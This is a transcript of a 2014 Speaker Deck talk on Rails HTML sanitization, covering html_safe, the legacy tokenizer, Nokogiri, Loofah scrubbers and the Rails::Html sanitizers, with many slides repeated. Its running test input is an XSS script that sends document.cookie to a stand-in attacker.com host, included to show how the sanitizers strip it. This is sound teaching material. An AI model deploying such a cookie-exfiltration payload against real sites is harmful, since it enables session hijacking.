Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Rails: The hidden parts

Rails: The hidden parts

Rafael França

April 26, 2014
Tweet

More Decks by Rafael França

Other Decks in Technology

Transcript

  1. string = "my string" # => "my string" ! string.html_safe?

    # => false ! safe_string = string.html_safe # => "my string" ! safe_string.html_safe? # => true HTML safety check
  2. string = "my string" # => "my string" ! string.html_safe?

    # => false ! safe_string = string.html_safe # => "my string" ! safe_string.html_safe? # => true HTML safety check
  3. string = "my string" # => "my string" ! string.html_safe?

    # => false ! safe_string = string.html_safe # => "my string" ! safe_string.html_safe? # => true HTML safety check
  4. my_html_string = "<b>HTML</b>" # => "<b>HTML</b>" ! ERB::Util.html_escape my_html_string #

    => "&lt;b&gt;HTML&lt;/b&gt;" ! ERB::Util.html_escape my_html_string.html_safe # => "<b>HTML</b>" rendering safe strings
  5. my_html_string = "<b>HTML</b>" # => "<b>HTML</b>" ! ERB::Util.html_escape my_html_string #

    => "&lt;b&gt;HTML&lt;/b&gt;" ! ERB::Util.html_escape my_html_string.html_safe # => "<b>HTML</b>" rendering safe strings
  6. my_html_string = "<b>HTML</b>" # => "<b>HTML</b>" ! ERB::Util.html_escape my_html_string #

    => "&lt;b&gt;HTML&lt;/b&gt;" ! ERB::Util.html_escape my_html_string.html_safe # => "<b>HTML</b>" rendering safe strings
  7. helper.sanitize(%{ Hello loser! <script> document.write( '<img src="http://www.attacker.com/' + document.cookie +

    '">' ); </script> }) # Hello loser! # <img src=\"http://www.attacker.com/&#39; + # document.cookie + # &#39;\">' # );
  8. tokenizer = HTML::Tokenizer.new(bad_string) tokenizer.next # => "Hello loser!\n" ! tokenizer.next

    # => "<script>" ! tokenizer.next # => "\n document.write(\n '" ! tokenizer.next # => "<img src=\"http://www.attacker.com/' +\n document.cookie +\n '\">" ! tokenizer.next # => "'\n );\n" ! tokenizer.next # => "</script>" ! tokenizer.next # => "\n" ! tokenizer.next # => nil
  9. tokenizer = HTML::Tokenizer.new(bad_string) tokenizer.next # => "Hello loser!\n" ! tokenizer.next

    # => "<script>" ! tokenizer.next # => "\n document.write(\n '" ! tokenizer.next # => "<img src=\"http://www.attacker.com/' +\n document.cookie +\n '\">" ! tokenizer.next # => "'\n );\n" ! tokenizer.next # => "</script>" ! tokenizer.next # => "\n" ! tokenizer.next # => nil
  10. tokenizer = HTML::Tokenizer.new(bad_string) tokenizer.next # => "Hello loser!\n" ! tokenizer.next

    # => "<script>" ! tokenizer.next # => "\n document.write(\n '" ! tokenizer.next # => "<img src=\"http://www.attacker.com/' +\n document.cookie +\n '\">" ! tokenizer.next # => "'\n );\n" ! tokenizer.next # => "</script>" ! tokenizer.next # => "\n" ! tokenizer.next # => nil
  11. tokenizer = HTML::Tokenizer.new(bad_string) tokenizer.next # => "Hello loser!\n" ! tokenizer.next

    # => "<script>" ! tokenizer.next # => "\n document.write(\n '" ! tokenizer.next # => "<img src=\"http://www.attacker.com/' +\n document.cookie +\n '\">" ! tokenizer.next # => "'\n );\n" ! tokenizer.next # => "</script>" ! tokenizer.next # => "\n" ! tokenizer.next # => nil
  12. tokenizer = HTML::Tokenizer.new(bad_string) tokenizer.next # => "Hello loser!\n" ! tokenizer.next

    # => "<script>" ! tokenizer.next # => "\n document.write(\n '" ! tokenizer.next # => "<img src=\"http://www.attacker.com/' +\n document.cookie +\n '\">" ! tokenizer.next # => "'\n );\n" ! tokenizer.next # => "</script>" ! tokenizer.next # => "\n" ! tokenizer.next # => nil
  13. tokenizer = HTML::Tokenizer.new(bad_string) tokenizer.next # => "Hello loser!\n" ! tokenizer.next

    # => "<script>" ! tokenizer.next # => "\n document.write(\n '" ! tokenizer.next # => "<img src=\"http://www.attacker.com/' +\n document.cookie +\n '\">" ! tokenizer.next # => "'\n );\n" ! tokenizer.next # => "</script>" ! tokenizer.next # => "\n" ! tokenizer.next # => nil
  14. tokenizer = HTML::Tokenizer.new(bad_string) tokenizer.next # => "Hello loser!\n" ! tokenizer.next

    # => "<script>" ! tokenizer.next # => "\n document.write(\n '" ! tokenizer.next # => "<img src=\"http://www.attacker.com/' +\n document.cookie +\n '\">" ! tokenizer.next # => "'\n );\n" ! tokenizer.next # => "</script>" ! tokenizer.next # => "\n" ! tokenizer.next # => nil
  15. tokenizer = HTML::Tokenizer.new(bad_string) tokenizer.next # => "Hello loser!\n" ! tokenizer.next

    # => "<script>" ! tokenizer.next # => "\n document.write(\n '" ! tokenizer.next # => "<img src=\"http://www.attacker.com/' +\n document.cookie +\n '\">" ! tokenizer.next # => "'\n );\n" ! tokenizer.next # => "</script>" ! tokenizer.next # => "\n" ! tokenizer.next # => nil
  16. tokenizer = HTML::Tokenizer.new(bad_string) tokenizer.next # => "Hello loser!\n" ! tokenizer.next

    # => "<script>" ! tokenizer.next # => "\n document.write(\n '" ! tokenizer.next # => "<img src=\"http://www.attacker.com/' +\n document.cookie +\n '\">" ! tokenizer.next # => "'\n );\n" ! tokenizer.next # => "</script>" ! tokenizer.next # => "\n" ! tokenizer.next # => nil
  17. def tokenize(text) tokenizer = HTML::Tokenizer.new(text) result = [] ! while

    token = tokenizer.next node = HTML::Node.parse(nil, 0, 0, token, false) result << node end ! result end
  18. def tokenize(text) tokenizer = HTML::Tokenizer.new(text) result = [] ! while

    token = tokenizer.next node = HTML::Node.parse(nil, 0, 0, token, false) result << node end ! result end
  19. def tokenize(text) tokenizer = HTML::Tokenizer.new(text) result = [] ! while

    token = tokenizer.next node = HTML::Node.parse(nil, 0, 0, token, false) result << node end ! result end
  20. def tokenize(text) tokenizer = HTML::Tokenizer.new(text) result = [] ! while

    token = tokenizer.next node = HTML::Node.parse(nil, 0, 0, token, false) result << node end ! result end
  21. Nodes nodes = tokenize(bad_string) # => [#<HTML::Text:..., …] ! nodes.map

    { |node| node.class } # => [HTML::Text, HTML::Tag, HTML::Text, # HTML::Tag, HTML::Text, HTML::Tag, HTML::Text]
  22. # [HTML::Text - "Hello loser!\n"] ! # [HTML::Tag - "<script>"]

    ! # [HTML::Text - "\n document.write(\n '"] ! # [HTML::Tag - "<img src=\"http://www.attacker.com/' + \n document.cookie +\n '\">"] ! # [HTML::Text - "'\n );\n"] ! # [HTML::Tag - "</script>"] ! # [HTML::Text - "\n"] Tokens
  23. # [HTML::Text - "Hello loser!\n"] ! # [HTML::Tag - "<script>"]

    ! # [HTML::Text - "\n document.write(\n '"] ! # [HTML::Tag - "<img src=\"http://www.attacker.com/' + \n document.cookie +\n '\">"] ! # [HTML::Text - "'\n );\n"] ! # [HTML::Tag - "</script>"] ! # [HTML::Text - "\n"] Tokens
  24. # [HTML::Text - "Hello loser!\n"] ! # [HTML::Tag - "<script>"]

    ! # [HTML::Text - "\n document.write(\n '"] ! # [HTML::Tag - "<img src=\"http://www.attacker.com/' + \n document.cookie +\n '\">"] ! # [HTML::Text - "'\n );\n"] ! # [HTML::Tag - "</script>"] ! # [HTML::Text - "\n"] Tokens
  25. # [HTML::Text - "Hello loser!\n"] ! # [HTML::Tag - "<script>"]

    ! # [HTML::Text - "\n document.write(\n '"] ! # [HTML::Tag - "<img src=\"http://www.attacker.com/' + \n document.cookie +\n '\">"] ! # [HTML::Text - "'\n );\n"] ! # [HTML::Tag - "</script>"] ! # [HTML::Text - "\n"] Tokens
  26. # [HTML::Text - "Hello loser!\n"] ! # [HTML::Tag - "<script>"]

    ! # [HTML::Text - "\n document.write(\n '"] ! # [HTML::Tag - "<img src=\"http://www.attacker.com/' + \n document.cookie +\n '\">"] ! # [HTML::Text - "'\n );\n"] ! # [HTML::Tag - "</script>"] ! # [HTML::Text - "\n"] Tokens
  27. # [HTML::Text - "Hello loser!\n"] ! # [HTML::Tag - "<script>"]

    ! # [HTML::Text - "\n document.write(\n '"] ! # [HTML::Tag - "<img src=\"http://www.attacker.com/' + \n document.cookie +\n '\">"] ! # [HTML::Text - "'\n );\n"] ! # [HTML::Tag - "</script>"] ! # [HTML::Text - "\n"] Tokens
  28. # [HTML::Text - "Hello loser!\n"] ! # [HTML::Tag - "<script>"]

    ! # [HTML::Text - "\n document.write(\n '"] ! # [HTML::Tag - "<img src=\"http://www.attacker.com/' + \n document.cookie +\n '\">"] ! # [HTML::Text - "'\n );\n"] ! # [HTML::Tag - "</script>"] ! # [HTML::Text - "\n"] Tokens
  29. # [HTML::Text - "Hello loser!\n"] ! # [HTML::Tag - "<script>"]

    ! # [HTML::Text - "\n document.write(\n '"] ! # [HTML::Tag - "<img src=\"http://www.attacker.com/' + \n document.cookie +\n '\">"] ! # [HTML::Text - "'\n );\n"] ! # [HTML::Tag - "</script>"] ! # [HTML::Text - "\n"] Tokens
  30. # [HTML::Text - "Hello loser!\n"] ! # [HTML::Tag - "<script>"]

    ! # [HTML::Text - "\n document.write(\n '"] ! # [HTML::Tag - "<img src=\"http://www.attacker.com/' + \n document.cookie +\n '\">"] ! # [HTML::Text - "'\n );\n"] ! # [HTML::Tag - "</script>"] ! # [HTML::Text - "\n"] Tokens
  31. def tokenize(text) tokenizer = HTML::Tokenizer.new(text) result = [] while token =

    tokenizer.next node = HTML::Node.parse(nil, 0, 0, token, false) process_node(node, result) end result end ! def process_node(node, result) result << node.to_s end
  32. def tokenize(text) tokenizer = HTML::Tokenizer.new(text) result = [] while token =

    tokenizer.next node = HTML::Node.parse(nil, 0, 0, token, false) process_node(node, result) end result end ! def process_node(node, result) result << node.to_s end
  33. Problems • code is hard to maintain • uses regular

    expressions to tokenize the string • very error prone • changing this code can open security holes
  34. doc = Nokogiri::HTML::DocumentFragment.parse(bad_string) ! doc.children.each { |n| p n }

    # => #<Nokogiri::XML::Text:0x3fc7f149acac "Hello loser!\n"> # => #<Nokogiri::XML::Element:0x3fc7f149ac48 name="script" children=[ # => #<Nokogiri::XML::CDATA:0x3fc7f149a658 "\n document.write(\n... # => ]>
  35. doc = Nokogiri::HTML::DocumentFragment.parse(bad_string) ! doc.children.each { |n| p n }

    # => #<Nokogiri::XML::Text:0x3fc7f149acac "Hello loser!\n"> # => #<Nokogiri::XML::Element:0x3fc7f149ac48 name="script" children=[ # => #<Nokogiri::XML::CDATA:0x3fc7f149a658 "\n document.write(\n... # => ]>
  36. doc = Nokogiri::HTML::DocumentFragment.parse(bad_string) ! doc.children.each { |n| p n }

    # => #<Nokogiri::XML::Text:0x3fc7f149acac "Hello loser!\n"> # => #<Nokogiri::XML::Element:0x3fc7f149ac48 name="script" children=[ # => #<Nokogiri::XML::CDATA:0x3fc7f149a658 "\n document.write(\n... # => ]>
  37. doc = Loofah.fragment(bad_string) ! remove_script = Loofah::Scrubber.new do |node| node.remove

    if node.name == "script" end ! doc.scrub!(remove_script) ! doc.to_text # => "Hello loser!\n"
  38. doc = Loofah.fragment(bad_string) ! remove_script = Loofah::Scrubber.new do |node| node.remove

    if node.name == "script" end ! doc.scrub!(remove_script) ! doc.to_text # => "Hello loser!\n"
  39. doc = Loofah.fragment(bad_string) ! remove_script = Loofah::Scrubber.new do |node| node.remove

    if node.name == "script" end ! doc.scrub!(remove_script) ! doc.to_text # => "Hello loser!\n"
  40. doc = Loofah.fragment(bad_string) ! remove_script = Loofah::Scrubber.new do |node| node.remove

    if node.name == "script" end ! doc.scrub!(remove_script) ! doc.to_text # => "Hello loser!\n"
  41. FullSanitizer full_sanitizer = Rails::Html::FullSanitizer.new ! full_sanitizer.sanitize( "<b>Bold</b> no more! <a

    href='more.html'>See more here</a>..." ) # => Bold no more! See more here...
  42. FullSanitizer full_sanitizer = Rails::Html::FullSanitizer.new ! full_sanitizer.sanitize( "<b>Bold</b> no more! <a

    href='more.html'>See more here</a>..." ) # => Bold no more! See more here...
  43. FullSanitizer full_sanitizer = Rails::Html::FullSanitizer.new ! full_sanitizer.sanitize( "<b>Bold</b> no more! <a

    href='more.html'>See more here</a>..." ) # => Bold no more! See more here...
  44. WhiteListSanitizer white_list_sanitizer = Rails::Html::WhiteListSanitizer.new ! white_list_sanitizer.sanitize(bad_string) # => "Hello loser!\n"

    ! good_string = "<b>Bold</b> no more! <a href='more.html'>See more here</a>..." ! white_list_sanitizer.sanitize(good_string) # => "<b>Bold</b> no more! <a href=\"more.html\">See more here</a>..." ! white_list_sanitizer.sanitize(good_string, tags: %w(b)) # => "<b>Bold</b> no more! See more here..." ! white_list_sanitizer.sanitize(@article.body, scrubber: ArticleScrubber.new)
  45. WhiteListSanitizer white_list_sanitizer = Rails::Html::WhiteListSanitizer.new ! white_list_sanitizer.sanitize(bad_string) # => "Hello loser!\n"

    ! good_string = "<b>Bold</b> no more! <a href='more.html'>See more here</a>..." ! white_list_sanitizer.sanitize(good_string) # => "<b>Bold</b> no more! <a href=\"more.html\">See more here</a>..." ! white_list_sanitizer.sanitize(good_string, tags: %w(b)) # => "<b>Bold</b> no more! See more here..." ! white_list_sanitizer.sanitize(@article.body, scrubber: ArticleScrubber.new)
  46. WhiteListSanitizer white_list_sanitizer = Rails::Html::WhiteListSanitizer.new ! white_list_sanitizer.sanitize(bad_string) # => "Hello loser!\n"

    ! good_string = "<b>Bold</b> no more! <a href='more.html'>See more here</a>..." ! white_list_sanitizer.sanitize(good_string) # => "<b>Bold</b> no more! <a href=\"more.html\">See more here</a>..." ! white_list_sanitizer.sanitize(good_string, tags: %w(b)) # => "<b>Bold</b> no more! See more here..." ! white_list_sanitizer.sanitize(@article.body, scrubber: ArticleScrubber.new)
  47. WhiteListSanitizer white_list_sanitizer = Rails::Html::WhiteListSanitizer.new ! white_list_sanitizer.sanitize(bad_string) # => "Hello loser!\n"

    ! good_string = "<b>Bold</b> no more! <a href='more.html'>See more here</a>..." ! white_list_sanitizer.sanitize(good_string) # => "<b>Bold</b> no more! <a href=\"more.html\">See more here</a>..." ! white_list_sanitizer.sanitize(good_string, tags: %w(b)) # => "<b>Bold</b> no more! See more here..." ! white_list_sanitizer.sanitize(@article.body, scrubber: ArticleScrubber.new)
  48. WhiteListSanitizer white_list_sanitizer = Rails::Html::WhiteListSanitizer.new ! white_list_sanitizer.sanitize(bad_string) # => "Hello loser!\n"

    ! good_string = "<b>Bold</b> no more! <a href='more.html'>See more here</a>..." ! white_list_sanitizer.sanitize(good_string) # => "<b>Bold</b> no more! <a href=\"more.html\">See more here</a>..." ! white_list_sanitizer.sanitize(good_string, tags: %w(b)) # => "<b>Bold</b> no more! See more here..." ! white_list_sanitizer.sanitize(@article.body, scrubber: ArticleScrubber.new)
  49. WhiteListSanitizer white_list_sanitizer = Rails::Html::WhiteListSanitizer.new ! white_list_sanitizer.sanitize(bad_string) # => "Hello loser!\n"

    ! good_string = "<b>Bold</b> no more! <a href='more.html'>See more here</a>..." ! white_list_sanitizer.sanitize(good_string) # => "<b>Bold</b> no more! <a href=\"more.html\">See more here</a>..." ! white_list_sanitizer.sanitize(good_string, tags: %w(b)) # => "<b>Bold</b> no more! See more here..." ! white_list_sanitizer.sanitize(@article.body, scrubber: ArticleScrubber.new)
  50. Custom Sanitizer! class MySanitizer < Rails::Html::Sanitizer def sanitize(html, options =

    {}) Loofah.scrub_fragment(html, MyCustomScrubber.new).to_s end end
  51. Scrubbers span2div = Loofah::Scrubber.new do |node| node.name = "div" if

    node.name == "span" end ! class Span2Div < Loofah::Scrubber def scrub(node) node.name = "div" if node.name == "span" end end
  52. Scrubbers span2div = Loofah::Scrubber.new do |node| node.name = "div" if

    node.name == "span" end ! class Span2Div < Loofah::Scrubber def scrub(node) node.name = "div" if node.name == "span" end end
  53. Scrubbers span2div = Loofah::Scrubber.new do |node| node.name = "div" if

    node.name == "span" end ! class Span2Div < Loofah::Scrubber def scrub(node) node.name = "div" if node.name == "span" end end
  54. Scrubbers class ArticleScrubber < Loofah::Scrubber def scrub(node) if node.name ==

    "gallery" replacement = render(partial: 'gallery') node.replace Loofah.fragment(replacement) end end end
  55. Scrubbers class ArticleScrubber < Loofah::Scrubber def scrub(node) if node.name ==

    "gallery" replacement = render(partial: 'gallery') node.replace Loofah.fragment(replacement) end end end
  56. Scrubbers class ArticleScrubber < Loofah::Scrubber def scrub(node) if node.name ==

    "gallery" replacement = render(partial: 'gallery') node.replace Loofah.fragment(replacement) end end end
  57. Scrubbers class ArticleScrubber < Loofah::Scrubber def scrub(node) if node.name ==

    "gallery" replacement = render(partial: 'gallery') node.replace Loofah.fragment(replacement) end end end
  58. Problems • Some HTML 5 documents are invalid for Nokogiri

    • Nokogiri requires libxml, which may not work on Windows • Some applications may break when upgrading